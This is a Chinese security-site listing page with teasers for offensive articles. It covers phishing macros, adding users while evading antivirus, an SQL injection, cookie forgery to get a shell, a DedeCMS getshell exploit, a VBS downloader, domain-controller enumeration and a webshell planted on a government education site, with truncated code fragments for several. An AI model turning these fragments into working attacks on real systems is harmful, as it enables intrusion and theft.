set - 第 12 | CN-SEC 中文网

安全闲碎

钓鱼文档碎碎念(五)

本文为总结文，总结常用的宏代码，希望能帮到用得到人。wmi启动进程Set objWMIService = GetObject("winmgmts:{impersonationLevel=imperso...

11月07日205 views评论

阅读全文

安全文章

bypass AV添加用户(三)

如题。之前发过两次绕过AV添加用户的方法，今天发第三种...绕过：源码如下：set wsnetwork=CreateObject("WSCRIPT.NETWORK")os="WinNT://"&...

08月30日293 views评论

阅读全文

漏洞时代

CmsTop媒体版中某处sql注入漏洞

问题出现在 uc.php接口中,没有正确的判断UC接口是否开启,而key又是默认的。因为代码中自己关闭了GPC，所以会导致注入。

01月01日609 views评论

阅读全文

帝国备份王(Empirebak)万能cookie及拿shell

1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456)

01月01日漏洞时代557 views评论

阅读全文

3389端口修改工具.bat

@echo off rem 查找端口号 for /f "skip=4 token s=3 delims= " %%i in ('reg query "HKEY_LOCAL_MACH...

11月21日moonsec_com445 views评论

阅读全文

查找域控的几个常用方法

1.net view 2.set log 3.通过srv记录 4.使用nltest 5.使用dsquery 6.使用netdom 这些都是win系统自带的命令，有的时候win版本不...

11月21日moonsec_com1,343 views评论

阅读全文

moonsec_com

帝国备份王(Empirebak)万能cookie及拿shell

帝国备份王(Empirebak)万能cookie及拿shell 漏洞作者： Flow 1.伪造cookie登录系统(其实这一步多余的,大多用户连密码都没改,都是默认的123456...

11月21日535 views评论

阅读全文

moonsec_com

Mysql语法绕过360scan insert防注入

其实Mysql不只可以用insert into xxx values 插入数据，还可以:insert into xxx set xx =

11月21日393 views评论

阅读全文

dede getshell exp

<?php error_reporting(0); @ini_set('memory_limit','-1'); set_time_limit(0); if(!$argv[1]){ echo "...

11月21日moonsec_com476 views评论

阅读全文

vbs下载者

一、VBS下载者： Set Post = CreateObject("Msxml2.XMLHTTP") Set Shell = CreateObject("Wscript.Shell") Post.O...

11月21日moonsec_com300 views评论

阅读全文

颓废's Blog

cookie一键式注射工具

使用方法很简单，如下图所示 Remove All是移除所有cookie信息，Set All是设置cookie，通常是document.cookie得到的字符串。

05月19日575 views评论

阅读全文

某政府教育网站0day

inurl:printpage.asp?ArticleID= 在后台版权信息栏里写入小马 if Request(“pass”)=”520″ then dim allen,creat,text,this...

05月19日颓废's Blog653 views评论

阅读全文

钓鱼文档碎碎念(五)

bypass AV添加用户(三)

CmsTop媒体版中某处sql注入漏洞

3389端口修改工具.bat

查找域控的几个常用方法

Mysql语法绕过360scan insert防注入

dede getshell exp

vbs下载者

某政府教育网站0day

在线咨询

微信